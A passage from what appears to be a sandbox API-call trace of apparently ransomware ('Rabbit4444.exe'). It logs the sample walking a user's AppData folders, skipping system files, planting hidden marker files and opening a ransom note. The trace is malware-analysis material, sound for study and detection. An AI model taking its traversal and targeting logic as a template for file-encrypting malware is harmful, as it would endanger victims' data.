(hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.591] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.591] CloseHandle (hObject=0x29c) returned 1 [0070.591] CloseHandle (hObject=0x27c) returned 1 [0070.591] GetCurrentThreadId () returned 0xd98 [0070.591] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0070.591] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache" [0070.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0070.592] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0070.592] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache" [0070.592] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\" [0070.592] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\.BFC0E91B00AE8A0620D3" [0070.592] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\targetedcontentcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0070.593] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.596] FlushFileBuffers (hFile=0x27c) returned 1 [0070.596] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.597] CloseHandle (hObject=0x27c) returned 1 [0070.597] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache") returned 125 [0070.597] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.597] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ca4042, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x6ca4042, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf366cca2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0070.597] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.597] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.597] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.597] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.597] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ca4042, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x6ca4042, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf366cca2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.597] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.597] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.597] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.597] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.597] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.597] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf366cca2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf366cca2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf366cca2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.598] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.598] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.598] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ca4042, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xa9ff77ac, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xa9ff77ac, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v3", cAlternateFileName="")) returned 1 [0070.598] lstrcmpiW (lpString1="v3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.598] lstrcmpiW (lpString1="v3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.598] lstrcmpiW (lpString1="v3", lpString2="Rabbit4444.exe") returned 1 [0070.598] lstrcmpiW (lpString1="v3", lpString2=".") returned 1 [0070.598] lstrcmpiW (lpString1="v3", lpString2="..") returned 1 [0070.598] lstrcmpiW (lpString1="v3", lpString2="windows") returned -1 [0070.598] lstrcmpiW (lpString1="v3", lpString2="bootmgr") returned 1 [0070.598] lstrcmpiW (lpString1="v3", lpString2="pagefile.sys") returned 1 [0070.598] lstrcmpiW (lpString1="v3", lpString2="boot") returned 1 [0070.598] lstrcmpiW (lpString1="v3", lpString2="ids.txt") returned 1 [0070.598] lstrcmpiW (lpString1="v3", lpString2="NTUSER.DAT") returned 1 [0070.598] lstrcpyW (in: lpString1=0x130ec34, lpString2="v3" | out: lpString1="v3") returned="v3" [0070.598] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0070.598] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x102) returned 0x109140 [0070.598] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x121fe8 [0070.598] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ca4042, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xa9ff77ac, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xa9ff77ac, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v3", cAlternateFileName="")) returned 0 [0070.598] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0070.598] lstrcpyW (in: lpString1=0x130ec34, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.598] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\targetedcontentcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0070.600] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.600] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.600] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.600] CloseHandle (hObject=0x29c) returned 1 [0070.601] CloseHandle (hObject=0x27c) returned 1 [0070.601] GetCurrentThreadId () returned 0xd98 [0070.601] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0070.601] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3" [0070.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0070.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0070.601] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3" [0070.601] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\" [0070.601] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\.BFC0E91B00AE8A0620D3" [0070.601] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\targetedcontentcache\\v3\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0070.603] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.606] FlushFileBuffers (hFile=0x27c) returned 1 [0070.607] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.607] CloseHandle (hObject=0x27c) returned 1 [0070.608] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3") returned 128 [0070.608] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.608] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ca4042, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xa9ff77ac, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xf366cca2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0070.608] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.608] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.608] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.608] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.608] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ca4042, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xa9ff77ac, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xf366cca2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.608] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.608] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.608] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.608] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.608] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.608] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf366cca2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf366cca2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf3692e47, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.608] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.608] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.608] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe9de3c89, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea1774fd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea1774fd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="280813", cAlternateFileName="")) returned 1 [0070.608] lstrcmpiW (lpString1="280813", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.608] lstrcmpiW (lpString1="280813", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.608] lstrcmpiW (lpString1="280813", lpString2="Rabbit4444.exe") returned -1 [0070.608] lstrcmpiW (lpString1="280813", lpString2=".") returned 1 [0070.608] lstrcmpiW (lpString1="280813", lpString2="..") returned 1 [0070.608] lstrcmpiW (lpString1="280813", lpString2="windows") returned -1 [0070.608] lstrcmpiW (lpString1="280813", lpString2="bootmgr") returned -1 [0070.608] lstrcmpiW (lpString1="280813", lpString2="pagefile.sys") returned -1 [0070.608] lstrcmpiW (lpString1="280813", lpString2="boot") returned -1 [0070.609] lstrcmpiW (lpString1="280813", lpString2="ids.txt") returned -1 [0070.609] lstrcmpiW (lpString1="280813", lpString2="NTUSER.DAT") returned -1 [0070.609] lstrcpyW (in: lpString1=0x130ec3a, lpString2="280813" | out: lpString1="280813") returned="280813" [0070.609] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221e0 [0070.609] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x110) returned 0x108f10 [0070.609] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221e8 | out: ListHead=0xf68b0, ListEntry=0x1221e8) returned 0x121fe8 [0070.609] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe9de3c89, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea1774fd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea1774fd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="280813", cAlternateFileName="")) returned 0 [0070.609] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0070.609] lstrcpyW (in: lpString1=0x130ec3a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.609] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\targetedcontentcache\\v3\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0070.609] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.609] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.610] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.610] CloseHandle (hObject=0x29c) returned 1 [0070.610] CloseHandle (hObject=0x27c) returned 1 [0070.610] GetCurrentThreadId () returned 0xd98 [0070.610] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221e8 [0070.610] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813" [0070.610] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0070.610] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221e0 | out: hHeap=0xe0000) returned 1 [0070.610] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813" [0070.610] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813\\" [0070.610] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813\\.BFC0E91B00AE8A0620D3" [0070.610] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\targetedcontentcache\\v3\\280813\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0070.617] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.619] FlushFileBuffers (hFile=0x27c) returned 1 [0070.620] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.620] CloseHandle (hObject=0x27c) returned 1 [0070.620] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813") returned 135 [0070.620] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.620] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe9de3c89, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea1774fd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf3692e47, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0070.621] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.621] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.621] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.621] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.621] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe9de3c89, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea1774fd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf3692e47, 